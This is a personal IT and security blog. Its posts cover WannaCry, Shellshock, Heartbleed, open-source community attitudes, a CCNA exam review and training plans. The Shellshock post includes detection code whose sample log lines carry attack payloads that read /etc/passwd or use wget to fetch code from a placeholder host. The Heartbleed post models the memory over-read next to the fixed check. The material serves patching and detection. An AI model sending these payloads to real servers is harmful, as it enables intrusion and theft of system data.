WannaCry……ain’t that the truth

What a month for security – if you haven’t seen the news (and this post is about a month late)…. You may wish to reconsider your stance on security.  Great information can be found on Symantec’s site.  Quite scary is how efficient these attacks are becoming…and the amount of money they are pulling in.

Stay safe everyone!

Posted in News, security

Another Year Down

I truly need to find more time to maintain this blog – it’s one of my bucket list items and frankly – something that I need to do.  We’ll start with little goals – seeing if I can muster 1 post a week – that would be nice!

Posted in News

It’s a new year

Well, it seems my blog has once again fallen by the wayside.  Too much going on and too much to recap here, but I am going to try to keep this site up to date a little better – looking at integrating some things like Twitter and such because I think it will be a good way to help broadcast security news.

Something interesting as of late that I am noticing – the leaking of source code for a lot of new bad stuff (generalized).  Case in point, Security Weekly posted this and I gotta tell you, it’s becoming a lot more commonplace.  A few searches on the deep web turn up even more interesting source code that’s making its way to the surface (no pun intended).

More to come – until then, stay safe and good luck in 2017!

Posted in News, security

Quick Update

Sorry about the delay in updates – it’s been a busy, busy year!  I’ll have to post about a few things, some certification achievements, some open source community news I found interesting – but overall, I hope everyone is having a great year as we round the bend to the end of 2015!!

Posted in Uncategorized

And now for Bash to take the spot light…..

Well folks – you might as well get used to this happening.  Thanks to the frothing madness of security, the uncontrollable amounts of money dumped into research and development (yet nothing to the actual projects we use EVERY..SINGLE…DAY – take a hint), we are going to continue to see this sort of thing happen and get more and more mainstream attention.  Not that I have anything against security – but any day we want to start diverting some money from finding bugs to fixing the projects – I’m all for it…

First – let’s talk about the bug itself.  I’ll let you read the actual NVD listing (CVE-2014-6271) for the details.  In a nutshell, bash treated the contents of any environment variable that began with “() {” as a function definition, and kept parsing past the closing brace – so anything an attacker tacked on after the “};” was executed the moment a new bash process imported its environment.  That is remote code execution in any service that lets untrusted input become an environment variable.  Nothing special, right?  We see this all the time.  The problem itself, in my opinion, isn’t the bug but:

  1. The almost blanket use of bash (it’s in EVERYTHING – and I wish that was an understatement)
  2. The poor APPLICATION of code checking
  3. The poor APPLICATION of security

This bug relies on the same thing almost all bugs do – the lack of checks on input before it is acted on.  As a very generic example – let’s say you have a public web server running CGI scripts written in bash (or scripts that spawn a shell).  The CGI specification hands every request header to the script as an environment variable (User-Agent becomes HTTP_USER_AGENT, for instance), so an attacker only has to send a header like “() { :;}; /bin/cat /etc/passwd” and the command runs with the web server’s privileges as soon as bash starts.  Some ideas that come to mind would be to pull back the contents of logs, the output of ps, or more valuable information….you can use your imagination.
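To make the CGI path above concrete, here is an added Python example (not code from the original post or from bash itself): it maps request headers to CGI environment variables the way RFC 3875 specifies, flags any variable whose value begins with the “() {” function-definition prefix, runs the same check over a few constructed Apache-style access log lines, and, if a bash binary is on PATH, runs the classic env one-liner against it.  The request, header values and log lines are constructed for illustration.

```python
"""Added example (not from the original post): how a CGI request reaches bash's
environment, plus a simple detector for the Shellshock function-definition prefix.

Assumptions: the request and log lines below are constructed for illustration;
the header-to-env mapping follows RFC 3875 (HTTP_ prefix, upper-case, '-' -> '_')."""
import re
import shutil
import subprocess

# Unpatched bash treated any env var whose value began with "() {" as an exported
# function and kept parsing past the closing brace, so commands after "};" ran when
# the shell started. For detection we match the prefix loosely (whitespace variants).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def cgi_environment(method, path, headers):
    """Build the CGI environment a web server hands to a script (RFC 3875 subset).
    Every request header becomes HTTP_<NAME>, which is exactly why attacker-controlled
    headers end up as variables in bash's environment."""
    env = {"REQUEST_METHOD": method, "SCRIPT_NAME": path, "GATEWAY_INTERFACE": "CGI/1.1"}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def tainted_variables(env):
    """Names of env vars whose value starts with the function-definition prefix."""
    return sorted(name for name, value in env.items()
                  if SHELLSHOCK_RE.match(value.lstrip()))


# Constructed Apache combined-format log lines; the last quoted field is the User-Agent.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/cat /etc/passwd"
203.0.113.9 - - [25/Sep/2014:10:01:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { foo;}; wget http://203.0.113.99/x -O /tmp/x"
"""


def suspicious_log_lines(log_text):
    """1-based line numbers of log entries containing the prefix anywhere."""
    return [lineno for lineno, line in enumerate(log_text.splitlines(), start=1)
            if SHELLSHOCK_RE.search(line)]


def local_bash_vulnerable():
    """Run the classic one-liner against the local bash.
    Returns True/False, or None if bash is not installed.  The 'echo vulnerable'
    after the function body only executes on an unpatched shell."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"}
    out = subprocess.run([bash, "-c", "echo test"], env=env,
                         capture_output=True, text=True)
    return "vulnerable" in out.stdout


if __name__ == "__main__":
    env = cgi_environment("GET", "/cgi-bin/status",
                          {"User-Agent": "() { :;}; /bin/cat /etc/passwd"})
    print("tainted env vars:", tainted_variables(env))
    print("suspicious log lines:", suspicious_log_lines(SAMPLE_LOG))
    print("local bash vulnerable:", local_bash_vulnerable())
```

The regex is deliberately broader than the exact four-character prefix bash looked for, since a detector should catch the spacing variants attackers tried; run the one-liner on a box you are allowed to test and expect a single "test" line if bash is patched.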

Now, having said that – see my list above.  We can’t do much about item 1 – that’s a given.  Even if we could, we would simply be replacing one problem with another (how long before we come up with issues in csh, ksh, etc…).  Number 2 however – that is something we can do something about.  I’m not going to go into it here….but suffice to say it wouldn’t hurt for developers to stop using circa 90’s methods of programming…

And for the rest of us sysadmins/engineers/etc – I bring up number 3.  SELinux doesn’t stop this bug from firing (the shell still runs), but it does confine what that shell can reach – a CGI script on a Red Hat box keeps running in the domain Apache’s scripts are confined to, so the attacker can only touch what those scripts were already allowed to touch.  So for us – it wouldn’t hurt to stop admin’ing our boxes as if it’s the 90’s…  Either use the security tools we have or patch, Patch, PATCH!

I’ll leave this article with this final thought – Yes, the bash bug/Shellshock, Heartbleed, and now the SSLv3 bug (POODLE) are issues – BUT, the patches are there, the tools to defend are there and there is NO REASON for these issues to be as rampant as they are.  We will ALWAYS find these sorts of bugs in code, closed or open.  But instead of people crucifying OpenSSL and Bash – maybe they should contribute to the project.  And instead of companies using the products for free and paying more and more third-party companies to FIND issues – maybe, just MAYBE, that money could go to the teams maintaining these tools so they can get the assistance they deserve and improve the products!  Just my 2c…

Posted in security

The “elite” IT community…..


It’s awesome…to be me!
Said Elitist every…single…time

I don’t know about you, but in my line of work I run into a lot of what I would call “elite IT”.

You know who I’m talking about, everyone has run into that person – he or she knows way more than you and you are wasting their time asking stupid questions. These folks usually have quite a few years of experience or a higher education degree or something in that combination that gives them a feeling of superiority.

Maybe it’s justified, maybe it’s not – either way they are going to let you know exactly how much of an inconvenience you are, why you shouldn’t be bothering them and why you shouldn’t have a computer… And I don’t care for it.

Allow me to explain a little more in depth.  See, I’ve worked with people like this most of my career. I even started out working for folks like this and it’s a miracle I stuck it out and made it as far as I have (Disclaimer:  I’m pretty stubborn). This is becoming especially true as of late since I’ve been doing more and more work in open source projects. I’m not sure what it is about the open source community, but when you get the hang of that one project, that one piece of software, sometimes it seems to bring out the worst in you.

Is this always true? No, of course not. But when the majority of people avoid open source projects because of the way the community reacts to them and their “noobness”, the only people that get hurt are the project members and community itself, which more often than not will suffer from what could be perceived as minor issues such as lack of documentation, lack of volunteer work and in general, lack of enthusiasm.

Case in point, I wrote about FreeNAS and some troubles I was having with it and I wanted to express my frustration with the project.  I accepted a comment and wanted to use it as the basis of this article.  But within a couple of days of allowing the comment to stand, I received another angry comment that I’m debating about posting. The comment basically bashes what I assume would be the previous person, using phrases implying that said person should get rid of their computers since they were too stupid to use them. Now this is one person in an ocean of people and certainly not by any stretch of the imagination the standard of what I expect from the open source community. But I’m always involved in different open source projects, and more often than not I hear from people around me whom I introduce to these projects that these are the very examples of why they don’t want to get involved. And I don’t blame them, I mean why get involved with a project that has folks that would rather bash than help you, when you can pay for the same product and get everything you need without the hassle?

Now – is this always the case – no.  A LOT of communities have gone way above the call to help others – too many to list here.

I guess what I’m saying is before you post that comment telling someone how to do something instead of answering their question (another beef I’ll post about later) or telling said person to RTFM, try to remember you had to start somewhere too.  And with the way the industry is going, we need more people involved and educated – not scared off.

Posted in Rant

Openssl – heartbleed – Z0MG!!!

Okay – figured I better get this one out there.  If you have not heard, check out http://heartbleed.com/ for some details on it.  Basically OpenSSL, again….is broken.  The CVE is CVE-2014-0160.  Here are the important notes:

  • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
  • OpenSSL 1.0.1g is NOT vulnerable
  • OpenSSL 1.0.0 branch is NOT vulnerable
  • OpenSSL 0.9.8 branch is NOT vulnerable

I got hacked because of this – Now what???

Get it patched ASAP!  Then treat your private keys as compromised – generate new ones, reissue the certificates and revoke the old ones.  Anything else that sat in the server’s memory (session cookies, passwords) should be rotated too, since each malicious heartbeat leaks up to 64KB of whatever happened to be next to the heartbeat buffer.

Am I going to get hacked cause I’m running 1.0.1abc(xxxxx)?

If I were a betting man – and you’ve got a public facing device with this on it….I wouldn’t bet against it happening, how about that?  Bottom line – get this one patched ASAP – don’t waste time if you can avoid it.  If you can’t patch – recompile without the heartbeat extension by passing -DOPENSSL_NO_HEARTBEATS to ./config.

If you can’t do either of the above, make sure your IDS/IPS is watching for TLS heartbeat requests whose declared payload length is larger than the record that carries them – that mismatch is the entire exploit.
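The recompile and IDS advice above both come down to one missing check, so here is an added Python model (not OpenSSL’s code) of the heartbeat handler: the pre-1.0.1g version copies however many bytes the attacker’s 16-bit length field declares, the fixed version discards the record when type + length + payload + 16 bytes of padding don’t fit inside it, and that same predicate is exposed as a standalone function an IDS could apply to a raw heartbeat record.  The “memory” is a constructed bytearray with a fake key marker placed right after the record; nothing here talks to a real TLS stack.

```python
"""Added example (not OpenSSL code): a model of the TLS heartbeat handler with the
Heartbleed bug beside the bounds check OpenSSL 1.0.1g added (CVE-2014-0160).

Message layout (RFC 6520): type(1) | payload_length(2, big-endian) | payload | padding(>=16).
'memory' below is a constructed bytearray standing in for the process heap."""
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16  # minimum padding the RFC requires after the payload


def build_heartbeat(payload, declared_length=None):
    """Build a heartbeat request; declared_length lets the caller lie about the size."""
    length = len(payload) if declared_length is None else declared_length
    return struct.pack("!BH", HB_REQUEST, length) + payload + b"\x00" * PADDING


def vulnerable_handler(memory, record_offset, record_length):
    """Pre-1.0.1g behaviour: trust payload_length from the peer and copy that many
    bytes starting at the payload, never comparing it with the record length."""
    hbtype, payload_length = struct.unpack_from("!BH", memory, record_offset)
    if hbtype != HB_REQUEST:
        return None
    start = record_offset + 3
    payload = bytes(memory[start:start + payload_length])  # reads past the record
    return struct.pack("!BH", HB_RESPONSE, payload_length) + payload + b"\x00" * PADDING


def fixed_handler(memory, record_offset, record_length):
    """1.0.1g behaviour: silently discard the record (RFC 6520 says discard) unless
    1 type byte + 2 length bytes + payload + 16 padding bytes fit inside it."""
    if record_length < 1 + 2 + PADDING:
        return None
    hbtype, payload_length = struct.unpack_from("!BH", memory, record_offset)
    if hbtype != HB_REQUEST:
        return None
    if 1 + 2 + payload_length + PADDING > record_length:
        return None
    start = record_offset + 3
    payload = bytes(memory[start:start + payload_length])
    return struct.pack("!BH", HB_RESPONSE, payload_length) + payload + b"\x00" * PADDING


def heartbeat_is_oversized(record):
    """The same bounds check as an IDS predicate over one raw heartbeat record."""
    if len(record) < 3:
        return True
    _, payload_length = struct.unpack_from("!BH", record, 0)
    return 1 + 2 + payload_length + PADDING > len(record)


def demo(secret=b"-----BEGIN RSA PRIVATE KEY-----"):
    """Place a lying record in front of a constructed secret and run both handlers.
    Returns (bytes the vulnerable handler sends back, fixed handler result)."""
    record = build_heartbeat(b"hi", declared_length=0x4000)
    memory = bytearray(record + secret + b"\x00" * 0x4000)
    leaked = vulnerable_handler(memory, 0, len(record))
    safe = fixed_handler(memory, 0, len(record))
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable handler leaked the secret:", b"PRIVATE KEY" in leaked)
    print("fixed handler response:", safe)
    print("IDS flags the record:", heartbeat_is_oversized(build_heartbeat(b"hi", 0x4000)))
```

The only difference between the two handlers is the one comparison against record_length; everything an IDS signature for this bug does is the same comparison applied on the wire.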

I normally don’t jump on this stuff but this is pretty hot and there is no reason not to at least recompile – while there are no known documented cases of exploitation, it doesn’t mean it hasn’t happened – it just means no one has admitted it yet.

Stay safe out there kids and remember…

Don’t panic.

Posted in security

Red Hat and CentOS team up??

You can read about it here……..But as you can imagine, I have my reservations about what is really going on.  For those of us with not so great past experiences regarding CentOS, this does leave me hopeful for its future.

The real question is – where does this leave other distros like Scientific Linux?

More to come on this…..stay tuned.

Posted in News

Passed my CCNA!!! Now a review!

This post sat in my drafts folder for awhile – so please keep that in mind when reading it.  Sorry about that!

I finally got around to it and took my Cisco Certified Network Associate exam (CCNA from here on out). I did this for quite a few reasons, which I’ll dive into later. Right now, I would like to use this article as a “review” of the exam, some prep work I did and final thoughts on it!

DISCLAIMER:  This is not a cheat, braindump, how-to-pass, etc…. and all details here are completely available from Cisco.  Also, I will be adhering to the NDA that all Cisco test takers agree to.

Now let’s get to it!  First and foremost, the test I took has been replaced.  I took the 640-802 and just made the window which I believe closed or is closing at the end of this month (at the time of this writing – October).  This review, albeit brief, will cover that version of the exam.

To sum it up, the exam was quite difficult!  I’m not by nature a network engineer but I do quite a bit of work with routers and switches and WAN links, VPNs, etc… you name it.  It’s just the nature of my job – I wear a ton of hats!  So, as you might guess, it just made sense to add this cert to my resume (as an added bonus, like many certs, it is accepted as college credit so take that for what it’s worth).  I started studying about 3 months in advance with the basics:  books, online references, and forums.  And like many advanced certs,  I did end up building a lab for this.  Now, I built my lab with the idea that I’m going to pursue my CCNP and possibly my  CCIE (stretching here folks; again I’m not by nature a network engineer so that’s more of a long term career thought I’ve had – more on that later) so my lab was a bit more expensive than the eBay kits but comparable to the equipment in those.  If you don’t have access to the resources to get cheap hardware, eBay is your friend (their CCNA kits fit the bill – here is an example of one).  Finally I used GNS3 as well (it’s quite a hog on resources so make sure your computer can handle it).  If you plan to stop at the CCNA, use that, otherwise stick with the hardware kits – nothing beats hands on physical hardware, IMHO.

Of all the resources I used, to be honest, the books were the most disappointing.  The books are so broad and cover so much on each topic that you get lost in the details.  To be frank, they are better off as references for your future in networking than as study material.  The best resource I found was the videos and material from CBT Nuggets.  If you can afford (or your employer can) to swing those videos, they are worth it!  Jeremy Cioara is a great educator, delivers the goods and his notes are great!

Finally, the exam.  The exam itself was hard, no doubt, BUT not unreasonable.  The questions were fair, no trickery or weird wording, and covered all of the topics I had read or reviewed or knew about from hands on experience (in other words, it’s very connected to real world experience).  I used the official Cisco guide (located on their exam site) to know what to study for – and the exam follows it to a “T”.  You do have some breathing room during the exam, but not much.  I think when I worked it out, it’s something like 2.5 min per question or something like that – so be sure you are ready for this exam!  Real world experience is going to help you out here but hands on time with the routers and switches in the kits above helped a great deal too (not everyone has access to a frame or MPLS links to play with).  Overall the exam was quite fair and challenging and I walked out of there really contemplating my next steps with Cisco.

To be honest – I got the CCNA because my cert list covers darn near all aspects of my IT career and I felt that a piece missing was networking.  While I do enjoy networking, I don’t know that I could see it being a full time function.  I enjoy security and open source platforms much more and find those to be fascinating enough.  That being said, I think anyone in the IT field that touches many aspects of IT could benefit from rounding themselves out with a networking cert – be it Network+ or the CCENT (a step down from the CCNA).  Networking seems to be a dark art that most admins avoid (much like programming, which is slowly being erased with the introduction of DevOps fundamentals).  So, if nothing else, it rounds out my cert list for potential employers and validates my own personal curiosity about my ability to function as a network engineer (even if it’s not at an in-depth level – I can still work with them and understand the issue(s) at hand better because of it).  Does this mean that I won’t pursue an in-depth path of networking like the CCIE?  No – it simply means at this time I’m going to continue down my current path and know that the option is there should the need arise.  In the rapidly changing IT world, it never hurts to have options, believe me.

And that’s about it on the CCNA – since I have checked and my version of the exam has been shelved, there isn’t much reason to go over the number of questions, time line, etc…. though I will say this – and it hasn’t changed so far as I know – Be Sure You Are Ready.  The reason I say that is during the exam, you CANNOT review your questions – once you select an answer and move on to the next question – THAT’S IT, no more review for that question!  This adds a level of difficulty to the exam that was previously unexpected so, again, know your stuff!  Good luck and let me know your thoughts on the exam!

Posted in Uncategorized

Training, training…and more training!

Admit it – you love training!  I love training!  We all scream for…what, that’s not right.  At any rate, I’ve been doing a lot of training right now – taking a lot of classes and reading up on the latest trends for IT and gaining some traction on new projects.  So, I apologize for the lack of content here.  Frankly, I’m thinking that shooting for one post per week would be awesome, but miraculous at this point (which, again I do apologize about).

So what new projects, tasks, software, process, etc, etc, etc, am I working on?  Well, it’s a mixed bag of things!  But here is a fairly decent summary:

  • Hadoop – If you haven’t heard of this….I’m not sure what to say but Google it along with big data.
  • Vagrant – Development environments on the fly – it’s a neat concept and I’m checking into it.
  • Chef/Puppet/(insert automation tool here) – these are hot, Hot, HOT right now!!!  If you are a sysadmin and you are NOT using one or both or at least learning about these tools…you are in danger of becoming obsolete!!!!
  • Virtualization – Focusing on certification goals more than anything, I’m looking into VMware, KVM and OpenStack for right now.
  • Security – Uhm….yeah.  Anything that has to do with Cryptology, SIEM, HIDS/IDS/IPS, etc….you get the picture – and for very obvious reasons (if recent news articles aren’t enough…)

All of these tools fall under two huge primary groupings – cloud and virtualization (even though that’s a bullet up there, it’s also a primary grouping and driver).  I say this because that is the latest trend in technology that has got everyone talking.  Amazon, RackSpace, OpenStack, Eucalyptus, RightScale, whatever the end goal is, it seems evident to me that the cost savings, the offsetting of responsibilities compared to old brick and mortar data centers, among other reasons, are too compelling not to be knowledgeable of these services.

So…I’m training on them.  It’s amazing to me how you can be so completely soaked in technology and still feel like a newbie when you start learning about new things like Hadoop (Hadoop will really, really make you feel like you’ve been in the dark ages when you start learning about it – also, you will definitely have at least one, “wow…where has this been” moment).  So, for right now I will continue my training march!  I’m using a lot of free resources and books which I plan to compile into a list and post here.

If you have any suggestions for resources, new technologies to look at, or just want to comment, drop a line!

Posted in News